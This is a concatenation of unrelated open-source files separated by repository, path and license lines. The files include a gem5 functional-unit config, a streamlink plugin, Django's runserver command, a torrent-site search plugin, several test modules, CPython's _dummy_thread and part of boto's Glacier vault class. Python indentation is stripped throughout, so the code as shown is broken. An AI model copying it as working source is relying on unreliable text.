# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Kevin Lim
from m5.SimObject import SimObject
from m5.params import *
from FuncUnit import *
from FuncUnitConfig import *
class FUPool(SimObject):
type = 'FUPool'
cxx_header = "cpu/o3/fu_pool.hh"
FUList = VectorParam.FUDesc("list of FU's for this pool")
class DefaultFUPool(FUPool):
FUList = [ IntALU(), IntMultDiv(), FP_ALU(), FP_MultDiv(), ReadPort(),
SIMD_Unit(), WritePort(), RdWrPort(), IprPort() ]
| bsd-3-clause |
mmetak/streamlink | src/streamlink/plugins/aftonbladet.py | 2 | 3010 | """Plugin for swedish news paper Aftonbladet's streaming service."""
import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import http, validate
from streamlink.stream import HDSStream, HLSStream
PLAYLIST_URL_FORMAT = "http://{address}/{path}/{filename}"
STREAM_TYPES = {
"hds": HDSStream.parse_manifest,
"hls": HLSStream.parse_variant_playlist
}
STREAM_FORMATS = ("m3u8", "f4m")
VIDEO_INFO_URL = "http://aftonbladet-play-static-ext.cdn.drvideo.aptoma.no/actions/video"
METADATA_URL = "http://aftonbladet-play-metadata.cdn.drvideo.aptoma.no/video/{0}.json"
_embed_re = re.compile(r"<iframe src=\"(http://tv.aftonbladet.se[^\"]+)\"")
_aptoma_id_re = re.compile(r"<div id=\"drvideo\".+data-aptomaId=\"([^\"]+)\"")
_live_re = re.compile(r"data-isLive=\"true\"")
_url_re = re.compile(r"http(s)?://(\w+.)?.aftonbladet.se")
_video_schema = validate.Schema(
{
"formats": validate.all(
{
validate.text: {
validate.text: validate.all(
dict,
validate.filter(lambda k, v: k in STREAM_FORMATS),
{
validate.text: [{
"address": validate.text,
"filename": validate.text,
"path": validate.text
}]
},
)
}
},
validate.filter(lambda k, v: k in STREAM_TYPES)
)
}
)
class Aftonbladet(Plugin):
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url)
def _get_streams(self):
res = http.get(self.url)
match = _embed_re.search(res.text)
if match:
res = http.get(match.group(1))
match = _aptoma_id_re.search(res.text)
if not match:
return
aptoma_id = match.group(1)
if not _live_re.search(res.text):
res = http.get(METADATA_URL.format(aptoma_id))
metadata = http.json(res)
video_id = metadata["videoId"]
else:
video_id = aptoma_id
res = http.get(VIDEO_INFO_URL, params=dict(id=video_id))
video = http.json(res, schema=_video_schema)
streams = {}
for fmt, providers in video["formats"].items():
for name, provider in providers.items():
for ext, playlists in provider.items():
for playlist in playlists:
url = PLAYLIST_URL_FORMAT.format(**playlist)
parser = STREAM_TYPES[fmt]
try:
streams.update(parser(self.session, url))
except IOError as err:
self.logger.error("Failed to extract {0} streams: {1}",
fmt.upper(), err)
return streams
__plugin__ = Aftonbladet
| bsd-2-clause |
sillywilly42/simian | src/tests/simian/mac/munki/handlers/catalogs_test.py | 1 | 1886 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Munki catalogs module tests."""
import httplib
import logging
from google.apputils import app
from tests.simian.mac.common import test
from simian.mac.munki.handlers import catalogs
class CatalogsHandlersTest(test.RequestHandlerTest):
def GetTestClassInstance(self):
return catalogs.Catalogs()
def GetTestClassModule(self):
return catalogs
def testGetSuccess(self):
"""Tests Catalogs.get()."""
name = 'goodname'
self.MockDoAnyAuth()
catalog = self.MockModelStatic(
'Catalog', 'MemcacheWrappedGet', name, 'plist_xml')
self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'
self.response.out.write(catalog).AndReturn(None)
self.mox.ReplayAll()
self.c.get(name)
self.mox.VerifyAll()
def testGet404(self):
"""Tests Catalogs.get() where name is not found."""
name = 'badname'
self.MockDoAnyAuth()
self.MockModelStaticBase(
'Catalog', 'MemcacheWrappedGet', name, 'plist_xml').AndReturn(None)
self.response.set_status(httplib.NOT_FOUND).AndReturn(None)
self.mox.ReplayAll()
self.c.get(name)
self.mox.VerifyAll()
logging.basicConfig(filename='/dev/null')
def main(unused_argv):
test.main(unused_argv)
if __name__ == '__main__':
app.run()
| apache-2.0 |
pmghalvorsen/gramps_branch | gramps/gui/selectors/selectcitation.py | 2 | 2470 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2003-2006 Donald N. Allingham
# 2009 Gary Burton
# Copyright (C) 2011 Tim G L Lyons, Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
SelectCitation class for GRAMPS.
"""
#-------------------------------------------------------------------------
#
# internationalization
#
#-------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.gettext
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from ..views.treemodels import CitationTreeModel
from .baseselector import BaseSelector
#-------------------------------------------------------------------------
#
# SelectSource
#
#-------------------------------------------------------------------------
class SelectCitation(BaseSelector):
def _local_init(self):
"""
Perform local initialisation for this class
"""
self.width_key = 'interface.source-sel-width'
self.height_key = 'interface.source-sel-height'
def get_window_title(self):
return _("Select Source or Citation")
def get_model_class(self):
return CitationTreeModel
def get_column_titles(self):
return [
(_('Source: Title or Citation: Volume/Page'), 350, BaseSelector.TEXT, 0),
(_('ID'), 75, BaseSelector.TEXT, 1),
(_('Last Change'), 150, BaseSelector.TEXT, 6),
]
def get_from_handle_func(self):
return self.db.get_source_from_handle
def get_from_handle_func2(self):
return self.db.get_citation_from_handle
| gpl-2.0 |
tttthemanCorp/CardmeleonAppEngine | django/contrib/staticfiles/management/commands/runserver.py | 163 | 1264 | from optparse import make_option
from django.conf import settings
from django.core.management.commands.runserver import BaseRunserverCommand
from django.contrib.staticfiles.handlers import StaticFilesHandler
class Command(BaseRunserverCommand):
option_list = BaseRunserverCommand.option_list + (
make_option('--nostatic', action="store_false", dest='use_static_handler', default=True,
help='Tells Django to NOT automatically serve static files at STATIC_URL.'),
make_option('--insecure', action="store_true", dest='insecure_serving', default=False,
help='Allows serving static files even if DEBUG is False.'),
)
help = "Starts a lightweight Web server for development and also serves static files."
def get_handler(self, *args, **options):
"""
Returns the static files serving handler.
"""
handler = super(Command, self).get_handler(*args, **options)
use_static_handler = options.get('use_static_handler', True)
insecure_serving = options.get('insecure_serving', False)
if (settings.DEBUG and use_static_handler or
(use_static_handler and insecure_serving)):
handler = StaticFilesHandler(handler)
return handler
| bsd-3-clause |
Hellowlol/PyTunes | libs/engines/other/piratebay.py | 1 | 4507 | #VERSION: 1.53
#AUTHORS: Fabien Devaux ([email protected])
#CONTRIBUTORS: Christophe Dumez ([email protected])
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the names of its contributors may be
# used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from novaprinter import prettyPrinter
import sgmllib
from helpers import retrieve_url, download_file
PREVIOUS_IDS = set()
class piratebay(object):
url = 'https://thepiratebay.se'
name = 'The Pirate Bay'
supported_categories = {'all': '0', 'movies': '200', 'music': '100', 'games': '400', 'software': '300'}
def __init__(self):
self.results = []
self.parser = self.SimpleSGMLParser(self.results, self.url)
def download_torrent(self, info):
print download_file(info)
class SimpleSGMLParser(sgmllib.SGMLParser):
def __init__(self, results, url, *args):
sgmllib.SGMLParser.__init__(self)
self.td_counter = None
self.current_item = None
self.results = results
self.url = url
self.code = 0
self.in_name = None
def start_a(self, attr):
params = dict(attr)
if params['href'].startswith('/torrent/'):
self.current_item = {}
self.td_counter = 0
self.current_item['desc_link'] = self.url + params['href'].strip()
self.in_name = True
self.current_item['id'] = params['href'].split('/')[2]
elif params['href'].startswith('magnet:'):
self.current_item['link']=params['href'].strip()
self.in_name = False
def handle_data(self, data):
if self.td_counter == 0:
if self.in_name:
if not self.current_item.has_key('name'):
self.current_item['name'] = ''
self.current_item['name']+= data.strip()
else:
#Parse size
if 'Size' in data:
self.current_item['size'] = data[data.index("Size")+5:]
self.current_item['size'] = self.current_item['size'][:self.current_item['size'].index(',')]
elif self.td_counter == 1:
if not self.current_item.has_key('seeds'):
self.current_item['seeds'] = ''
self.current_item['seeds']+= data.strip()
elif self.td_counter == 2:
if not self.current_item.has_key('leech'):
self.current_item['leech'] = ''
self.current_item['leech']+= data.strip()
def start_td(self,attr):
if isinstance(self.td_counter,int):
self.td_counter += 1
if self.td_counter > 3:
self.td_counter = None
# Display item
if self.current_item:
if self.current_item['id'] in PREVIOUS_IDS:
self.results = []
self.reset()
return
self.current_item['engine_url'] = self.url
if not self.current_item['seeds'].isdigit():
self.current_item['seeds'] = 0
if not self.current_item['leech'].isdigit():
self.current_item['leech'] = 0
prettyPrinter(self.current_item)
PREVIOUS_IDS.add(self.current_item['id'])
self.results.append('a')
def search(self, what, cat='all'):
ret = []
i = 0
order = 'se'
while True and i<11:
results = []
parser = self.SimpleSGMLParser(results, self.url)
dat = retrieve_url(self.url+'/search/%s/%d/7/%s' % (what, i, self.supported_categories[cat]))
parser.feed(dat)
parser.close()
if len(results) <= 0:
break
i += 1
| gpl-3.0 |
mfalesni/cfme_tests | cfme/tests/test_db_restore.py | 2 | 3688 | import fauxfactory
import pytest
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.common.vm import VM
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from fixtures.pytest_store import store
from cfme.utils.log import logger
from cfme.utils.providers import list_providers_by_class
def provider_app_crud(provider_class, appliance):
try:
prov = list_providers_by_class(provider_class)[0]
prov.appliance = appliance
return prov
except IndexError:
pytest.skip("No {} providers available (required)".format(provider_class.type))
def provision_vm(request, provider):
"""Function to provision appliance to the provider being tested"""
vm_name = "test_rest_db_" + fauxfactory.gen_alphanumeric()
vm = VM.factory(vm_name, provider)
request.addfinalizer(vm.delete_from_provider)
if not provider.mgmt.does_vm_exist(vm_name):
logger.info("deploying %s on provider %s", vm_name, provider.key)
vm.create_on_provider(allow_skip="default")
else:
logger.info("recycling deployed vm %s on provider %s", vm_name, provider.key)
vm.provider.refresh_provider_relationships()
return vm
@pytest.fixture(scope="module")
def get_appliances(temp_appliances_unconfig_modscope_rhevm):
"""Returns two database-owning appliances
"""
appl1 = temp_appliances_unconfig_modscope_rhevm[0]
appl2 = temp_appliances_unconfig_modscope_rhevm[1]
appl1.configure(region=0)
appl1.wait_for_web_ui()
appl2.configure(region=0)
appl2.wait_for_web_ui()
return temp_appliances_unconfig_modscope_rhevm
# TODO Refactore test in to fixtures
@pytest.mark.tier(2)
@pytest.mark.uncollectif(
lambda: not store.current_appliance.is_downstream)
def test_db_restore(request, soft_assert, get_appliances):
appl1, appl2 = get_appliances
# Manage infra,cloud providers and set some roles before taking a DB backup
server_info = appl1.server.settings
server_info.enable_server_roles('automate')
roles = server_info.server_roles_db
provider_app_crud(VMwareProvider, appl1).setup()
provider_app_crud(EC2Provider, appl1).setup()
appl1.db.backup()
# Fetch v2_key and DB backup from the first appliance
rand_filename = "/tmp/v2_key_{}".format(fauxfactory.gen_alphanumeric())
appl1.ssh_client.get_file("/var/www/miq/vmdb/certs/v2_key", rand_filename)
dump_filename = "/tmp/db_dump_{}".format(fauxfactory.gen_alphanumeric())
appl1.ssh_client.get_file("/tmp/evm_db.backup", dump_filename)
# Push v2_key and DB backup to second appliance
appl2.ssh_client.put_file(rand_filename, "/var/www/miq/vmdb/certs/v2_key")
appl2.ssh_client.put_file(dump_filename, "/tmp/evm_db.backup")
# Restore DB on the second appliance
appl2.evmserverd.stop()
appl2.db.drop()
appl2.db.restore()
appl2.start_evm_service()
appl2.wait_for_web_ui()
# Assert providers on the second appliance
assert set(appl2.managed_provider_names) == set(appl1.managed_provider_names), (
'Restored DB is missing some providers'
)
# Verify that existing provider can detect new VMs on the second appliance
virtual_crud = provider_app_crud(VMwareProvider, appl2)
vm = provision_vm(request, virtual_crud)
soft_assert(vm.provider.mgmt.is_vm_running(vm.name), "vm running")
# Assert server roles on the second appliance
for role, is_enabled in server_info.server_roles_ui.iteritems():
if is_enabled:
assert roles[role], "Role '{}' is selected but should not be".format(role)
else:
assert not roles[role], "Role '{}' is not selected but should be".format(role)
| gpl-2.0 |
defance/edx-platform | openedx/core/lib/api/tests/test_exceptions.py | 11 | 2703 | """
Test Custom Exceptions
"""
import ddt
from django.test import TestCase
from rest_framework import exceptions as drf_exceptions
from .. import exceptions
@ddt.ddt
class TestDictExceptionsAllowDictDetails(TestCase):
"""
Standard DRF exceptions coerce detail inputs to strings. We want to use
dicts to allow better customization of error messages. Demonstrate that
we can provide dictionaries as exception details, and that custom
classes subclass the relevant DRF exceptions, to provide consistent
exception catching behavior.
"""
def test_drf_errors_coerce_strings(self):
# Demonstrate the base issue we are trying to solve.
exc = drf_exceptions.AuthenticationFailed({u'error_code': -1})
self.assertEqual(exc.detail, u"{u'error_code': -1}")
@ddt.data(
exceptions.AuthenticationFailed,
exceptions.NotAuthenticated,
exceptions.NotFound,
exceptions.ParseError,
exceptions.PermissionDenied,
)
def test_exceptions_allows_dict_detail(self, exception_class):
exc = exception_class({u'error_code': -1})
self.assertEqual(exc.detail, {u'error_code': -1})
def test_method_not_allowed_allows_dict_detail(self):
exc = exceptions.MethodNotAllowed(u'POST', {u'error_code': -1})
self.assertEqual(exc.detail, {u'error_code': -1})
def test_not_acceptable_allows_dict_detail(self):
exc = exceptions.NotAcceptable({u'error_code': -1}, available_renderers=['application/json'])
self.assertEqual(exc.detail, {u'error_code': -1})
self.assertEqual(exc.available_renderers, ['application/json'])
@ddt.ddt
class TestDictExceptionSubclassing(TestCase):
"""
Custom exceptions should subclass standard DRF exceptions, so code that
catches the DRF exceptions also catches ours.
"""
@ddt.data(
(exceptions.AuthenticationFailed, drf_exceptions.AuthenticationFailed),
(exceptions.NotAcceptable, drf_exceptions.NotAcceptable),
(exceptions.NotAuthenticated, drf_exceptions.NotAuthenticated),
(exceptions.NotFound, drf_exceptions.NotFound),
(exceptions.ParseError, drf_exceptions.ParseError),
(exceptions.PermissionDenied, drf_exceptions.PermissionDenied),
)
@ddt.unpack
def test_exceptions_subclass_drf_exceptions(self, exception_class, drf_exception_class):
exc = exception_class({u'error_code': -1})
self.assertIsInstance(exc, drf_exception_class)
def test_method_not_allowed_subclasses_drf_exception(self):
exc = exceptions.MethodNotAllowed(u'POST', {u'error_code': -1})
self.assertIsInstance(exc, drf_exceptions.MethodNotAllowed)
| agpl-3.0 |
craigderington/studentloan5 | studentloan5/Lib/_dummy_thread.py | 106 | 4872 | """Drop-in replacement for the thread module.
Meant to be used as a brain-dead substitute so that threaded code does
not need to be rewritten for when the thread module is not present.
Suggested usage is::
try:
import _thread
except ImportError:
import _dummy_thread as _thread
"""
# Exports only things specified by thread documentation;
# skipping obsolete synonyms allocate(), start_new(), exit_thread().
__all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock',
'interrupt_main', 'LockType']
# A dummy value
TIMEOUT_MAX = 2**31
# NOTE: this module can be imported early in the extension building process,
# and so top level imports of other modules should be avoided. Instead, all
# imports are done when needed on a function-by-function basis. Since threads
# are disabled, the import lock should not be an issue anyway (??).
error = RuntimeError
def start_new_thread(function, args, kwargs={}):
"""Dummy implementation of _thread.start_new_thread().
Compatibility is maintained by making sure that ``args`` is a
tuple and ``kwargs`` is a dictionary. If an exception is raised
and it is SystemExit (which can be done by _thread.exit()) it is
caught and nothing is done; all other exceptions are printed out
by using traceback.print_exc().
If the executed function calls interrupt_main the KeyboardInterrupt will be
raised when the function returns.
"""
if type(args) != type(tuple()):
raise TypeError("2nd arg must be a tuple")
if type(kwargs) != type(dict()):
raise TypeError("3rd arg must be a dict")
global _main
_main = False
try:
function(*args, **kwargs)
except SystemExit:
pass
except:
import traceback
traceback.print_exc()
_main = True
global _interrupt
if _interrupt:
_interrupt = False
raise KeyboardInterrupt
def exit():
"""Dummy implementation of _thread.exit()."""
raise SystemExit
def get_ident():
"""Dummy implementation of _thread.get_ident().
Since this module should only be used when _threadmodule is not
available, it is safe to assume that the current process is the
only thread. Thus a constant can be safely returned.
"""
return -1
def allocate_lock():
"""Dummy implementation of _thread.allocate_lock()."""
return LockType()
def stack_size(size=None):
"""Dummy implementation of _thread.stack_size()."""
if size is not None:
raise error("setting thread stack size not supported")
return 0
def _set_sentinel():
"""Dummy implementation of _thread._set_sentinel()."""
return LockType()
class LockType(object):
"""Class implementing dummy implementation of _thread.LockType.
Compatibility is maintained by maintaining self.locked_status
which is a boolean that stores the state of the lock. Pickling of
the lock, though, should not be done since if the _thread module is
then used with an unpickled ``lock()`` from here problems could
occur from this class not having atomic methods.
"""
def __init__(self):
self.locked_status = False
def acquire(self, waitflag=None, timeout=-1):
"""Dummy implementation of acquire().
For blocking calls, self.locked_status is automatically set to
True and returned appropriately based on value of
``waitflag``. If it is non-blocking, then the value is
actually checked and not set if it is already acquired. This
is all done so that threading.Condition's assert statements
aren't triggered and throw a little fit.
"""
if waitflag is None or waitflag:
self.locked_status = True
return True
else:
if not self.locked_status:
self.locked_status = True
return True
else:
if timeout > 0:
import time
time.sleep(timeout)
return False
__enter__ = acquire
def __exit__(self, typ, val, tb):
self.release()
def release(self):
"""Release the dummy lock."""
# XXX Perhaps shouldn't actually bother to test? Could lead
# to problems for complex, threaded code.
if not self.locked_status:
raise error
self.locked_status = False
return True
def locked(self):
return self.locked_status
# Used to signal that interrupt_main was called in a "thread"
_interrupt = False
# True when not executing in a "thread"
_main = True
def interrupt_main():
"""Set _interrupt flag to True to have start_new_thread raise
KeyboardInterrupt upon exiting."""
if _main:
raise KeyboardInterrupt
else:
global _interrupt
_interrupt = True
| bsd-3-clause |
rahul67/hue | desktop/core/ext-py/boto-2.38.0/boto/glacier/vault.py | 153 | 17601 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Thomas Parslow http://almostobsolete.net/
# Copyright (c) 2012 Robie Basak <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import codecs
from boto.glacier.exceptions import UploadArchiveError
from boto.glacier.job import Job
from boto.glacier.writer import compute_hashes_from_fileobj, \
resume_file_upload, Writer
from boto.glacier.concurrent import ConcurrentUploader
from boto.glacier.utils import minimum_part_size, DEFAULT_PART_SIZE
import os.path
_MEGABYTE = 1024 * 1024
_GIGABYTE = 1024 * _MEGABYTE
MAXIMUM_ARCHIVE_SIZE = 10000 * 4 * _GIGABYTE
MAXIMUM_NUMBER_OF_PARTS = 10000
class Vault(object):
DefaultPartSize = DEFAULT_PART_SIZE
SingleOperationThreshold = 100 * _MEGABYTE
ResponseDataElements = (('VaultName', 'name', None),
('VaultARN', 'arn', None),
('CreationDate', 'creation_date', None),
('LastInventoryDate', 'last_inventory_date', None),
('SizeInBytes', 'size', 0),
('NumberOfArchives', 'number_of_archives', 0))
def __init__(self, layer1, response_data=None):
self.layer1 = layer1
if response_data:
for response_name, attr_name, default in self.ResponseDataElements:
value = response_data[response_name]
setattr(self, attr_name, value)
else:
for response_name, attr_name, default in self.ResponseDataElements:
setattr(self, attr_name, default)
def __repr__(self):
return 'Vault("%s")' % self.arn
def delete(self):
"""
Delete's this vault. WARNING!
"""
self.layer1.delete_vault(self.name)
def upload_archive(self, filename, description=None):
"""
Adds an archive to a vault. For archives greater than 100MB the
multipart upload will be used.
:type file: str
:param file: A filename to upload
:type description: str
:param description: An optional description for the archive.
:rtype: str
:return: The archive id of the newly created archive
"""
if os.path.getsize(filename) > self.SingleOperationThreshold:
return self.create_archive_from_file(filename, description=description)
return self._upload_archive_single_operation(filename, description)
def _upload_archive_single_operation(self, filename, description):
"""
Adds an archive to a vault in a single operation. It's recommended for
archives less than 100MB
:type file: str
:param file: A filename to upload
:type description: str
:param description: A description for the archive.
:rtype: str
:return: The archive id of the newly created archive
"""
with open(filename, 'rb') as fileobj:
linear_hash, tree_hash = compute_hashes_from_fileobj(fileobj)
fileobj.seek(0)
response = self.layer1.upload_archive(self.name, fileobj,
linear_hash, tree_hash,
description)
return response['ArchiveId']
def create_archive_writer(self, part_size=DefaultPartSize,
description=None):
"""
Create a new archive and begin a multi-part upload to it.
Returns a file-like object to which the data for the archive
can be written. Once all the data is written the file-like
object should be closed, you can then call the get_archive_id
method on it to get the ID of the created archive.
:type part_size: int
:param part_size: The part size for the multipart upload.
:type description: str
:param description: An optional description for the archive.
:rtype: :class:`boto.glacier.writer.Writer`
:return: A Writer object that to which the archive data
should be written.
"""
response = self.layer1.initiate_multipart_upload(self.name,
part_size,
description)
return Writer(self, response['UploadId'], part_size=part_size)
def create_archive_from_file(self, filename=None, file_obj=None,
description=None, upload_id_callback=None):
"""
Create a new archive and upload the data from the given file
or file-like object.
:type filename: str
:param filename: A filename to upload
:type file_obj: file
:param file_obj: A file-like object to upload
:type description: str
:param description: An optional description for the archive.
:type upload_id_callback: function
:param upload_id_callback: if set, call with the upload_id as the
only parameter when it becomes known, to enable future calls
to resume_archive_from_file in case resume is needed.
:rtype: str
:return: The archive id of the newly created archive
"""
part_size = self.DefaultPartSize
if not file_obj:
file_size = os.path.getsize(filename)
try:
part_size = minimum_part_size(file_size, part_size)
except ValueError:
raise UploadArchiveError("File size of %s bytes exceeds "
"40,000 GB archive limit of Glacier.")
file_obj = open(filename, "rb")
writer = self.create_archive_writer(
description=description,
part_size=part_size)
if upload_id_callback:
upload_id_callback(writer.upload_id)
while True:
data = file_obj.read(part_size)
if not data:
break
writer.write(data)
writer.close()
return writer.get_archive_id()
@staticmethod
def _range_string_to_part_index(range_string, part_size):
start, inside_end = [int(value) for value in range_string.split('-')]
end = inside_end + 1
length = end - start
if length == part_size + 1:
# Off-by-one bug in Amazon's Glacier implementation,
# see: https://forums.aws.amazon.com/thread.jspa?threadID=106866
# Workaround: since part_size is too big by one byte, adjust it
end -= 1
inside_end -= 1
length -= 1
assert not (start % part_size), (
"upload part start byte is not on a part boundary")
assert (length <= part_size), "upload part is bigger than part size"
return start // part_size
def resume_archive_from_file(self, upload_id, filename=None,
file_obj=None):
"""Resume upload of a file already part-uploaded to Glacier.
The resumption of an upload where the part-uploaded section is empty
is a valid degenerate case that this function can handle.
One and only one of filename or file_obj must be specified.
:type upload_id: str
:param upload_id: existing Glacier upload id of upload being resumed.
:type filename: str
:param filename: file to open for resume
:type fobj: file
:param fobj: file-like object containing local data to resume. This
must read from the start of the entire upload, not just from the
point being resumed. Use fobj.seek(0) to achieve this if necessary.
:rtype: str
:return: The archive id of the newly created archive
"""
part_list_response = self.list_all_parts(upload_id)
part_size = part_list_response['PartSizeInBytes']
part_hash_map = {}
for part_desc in part_list_response['Parts']:
part_index = self._range_string_to_part_index(
part_desc['RangeInBytes'], part_size)
part_tree_hash = codecs.decode(part_desc['SHA256TreeHash'], 'hex_codec')
part_hash_map[part_index] = part_tree_hash
if not file_obj:
file_obj = open(filename, "rb")
return resume_file_upload(
self, upload_id, part_size, file_obj, part_hash_map)
def concurrent_create_archive_from_file(self, filename, description,
**kwargs):
"""
Create a new archive from a file and upload the given
file.
This is a convenience method around the
:class:`boto.glacier.concurrent.ConcurrentUploader`
class. This method will perform a multipart upload
and upload the parts of the file concurrently.
:type filename: str
:param filename: A filename to upload
:param kwargs: Additional kwargs to pass through to
:py:class:`boto.glacier.concurrent.ConcurrentUploader`.
You can pass any argument besides the ``api`` and
``vault_name`` param (these arguments are already
passed to the ``ConcurrentUploader`` for you).
:raises: `boto.glacier.exception.UploadArchiveError` is an error
occurs during the upload process.
:rtype: str
:return: The archive id of the newly created archive
"""
uploader = ConcurrentUploader(self.layer1, self.name, **kwargs)
archive_id = uploader.upload(filename, description)
return archive_id
def retrieve_archive(self, archive_id, sns_topic=None,
description=None):
"""
Initiate a archive retrieval job to download the data from an
archive. You will need to wait for the notification from
Amazon (via SNS) before you can actually download the data,
this takes around 4 hours.
:type archive_id: str
:param archive_id: The id of the archive
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:rtype: :class:`boto.glacier.job.Job`
:return: A Job object representing the retrieval job.
"""
job_data = {'Type': 'archive-retrieval',
'ArchiveId': archive_id}
if sns_topic is not None:
job_data['SNSTopic'] = sns_topic
if description is not None:
job_data['Description'] = description
response = self.layer1.initiate_job(self.name, job_data)
return self.get_job(response['JobId'])
def retrieve_inventory(self, sns_topic=None,
description=None, byte_range=None,
start_date=None, end_date=None,
limit=None):
"""
Initiate a inventory retrieval job to list the items in the
vault. You will need to wait for the notification from
Amazon (via SNS) before you can actually download the data,
this takes around 4 hours.
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:type byte_range: str
:param byte_range: Range of bytes to retrieve.
:type start_date: DateTime
:param start_date: Beginning of the date range to query.
:type end_date: DateTime
:param end_date: End of the date range to query.
:type limit: int
:param limit: Limits the number of results returned.
:rtype: str
:return: The ID of the job
"""
job_data = {'Type': 'inventory-retrieval'}
if sns_topic is not None:
job_data['SNSTopic'] = sns_topic
if description is not None:
job_data['Description'] = description
if byte_range is not None:
job_data['RetrievalByteRange'] = byte_range
if start_date is not None or end_date is not None or limit is not None:
rparams = {}
if start_date is not None:
rparams['StartDate'] = start_date.strftime('%Y-%m-%dT%H:%M:%S%Z')
if end_date is not None:
rparams['EndDate'] = end_date.strftime('%Y-%m-%dT%H:%M:%S%Z')
if limit is not None:
rparams['Limit'] = limit
job_data['InventoryRetrievalParameters'] = rparams
response = self.layer1.initiate_job(self.name, job_data)
return response['JobId']
def retrieve_inventory_job(self, **kwargs):
"""
Identical to ``retrieve_inventory``, but returns a ``Job`` instance
instead of just the job ID.
:type description: str
:param description: An optional description for the job.
:type sns_topic: str
:param sns_topic: The Amazon SNS topic ARN where Amazon Glacier
sends notification when the job is completed and the output
is ready for you to download.
:type byte_range: str
:param byte_range: Range of bytes to retrieve.
:type start_date: DateTime
